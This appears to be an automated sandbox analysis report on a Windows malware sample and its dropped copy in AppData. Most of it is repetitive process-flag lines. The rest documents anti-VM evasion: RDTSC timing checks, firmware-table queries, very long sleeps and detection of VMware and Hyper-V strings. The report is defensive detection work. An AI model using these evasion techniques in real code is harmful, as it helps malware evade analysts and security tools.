Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: InXlDTKncKkCk.exe PID: 8096, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\po8909893299832.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\po8909893299832.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 2DB9904 second address: 2DB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 26D9904 second address: 26D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 2DB9B7E second address: 2DB9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 26D9B7E second address: 26D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 2350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 7350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 8350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 8500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Memory allocated: 9500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 72A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 82A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 8530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Memory allocated: 9530000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\po8909893299832.exe

Code function: 9_2_01A5096E rdtsc

9_2_01A5096E

Source: C:\Users\user\Desktop\po8909893299832.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7620	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6362	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8775	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1174	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 759	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 9621
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5799
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4103
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 607
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 613

Source: C:\Users\user\Desktop\po8909893299832.exe	API coverage: 0.9 %
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	API coverage: 1.9 %

Source: C:\Users\user\Desktop\po8909893299832.exe TID: 7576	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 7620 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2080	Thread sleep count: 8775 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2080	Thread sleep time: -17550000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2080	Thread sleep count: 1174 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2080	Thread sleep time: -2348000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe TID: 8100	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe TID: 8116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2944	Thread sleep count: 130 > 30
Source: C:\Windows\SysWOW64\cscript.exe TID: 2944	Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 2944	Thread sleep count: 9621 > 30
Source: C:\Windows\SysWOW64\cscript.exe TID: 2944	Thread sleep time: -19242000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5568	Thread sleep time: -11598000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5568	Thread sleep time: -8206000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\po8909893299832.exe	Thread delayed: delay time: 35000	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Thread delayed: delay time: 35000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000001C.00000003.2436035754.0000000004980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: explorer.exe, 0000001C.00000003.2553926787.0000000008DAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001C.00000003.2552903482.000000000C6CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 0000000A.00000002.2426276889.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&
Source: explorer.exe, 0000001C.00000003.2436035754.0000000004980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001C.00000002.3877919375.0000000008EA1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3692744839.0000000008EA1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008EA1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2482136380.0000000008EA1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008EA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: explorer.exe, 0000001C.00000003.2553926787.0000000008F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: explorer.exe, 0000000A.00000000.1427258598.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: explorer.exe, 0000000A.00000000.1445045558.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1480835602.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3692744839.0000000008ED1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2482136380.0000000008ED1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008ED1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3877919375.0000000008ED1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008ED1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001C.00000003.3688885669.0000000008F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001C.00000003.2521124675.0000000008FB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000003.2521124675.0000000008FB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}N
Source: explorer.exe, 0000001C.00000003.2553926787.0000000008F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}R
Source: explorer.exe, 0000000A.00000003.1480835602.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001C.00000003.2436035754.0000000004980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 0000000A.00000003.1484011745.0000000009290000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 0000000A.00000003.1480835602.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: explorer.exe, 0000001C.00000002.3853757556.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&1
Source: explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000A.00000003.1484011745.0000000009290000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00base
Source: explorer.exe, 0000001C.00000003.2575476121.000000000C54F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:y
Source: explorer.exe, 0000001C.00000003.2436035754.0000000004980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\lYx
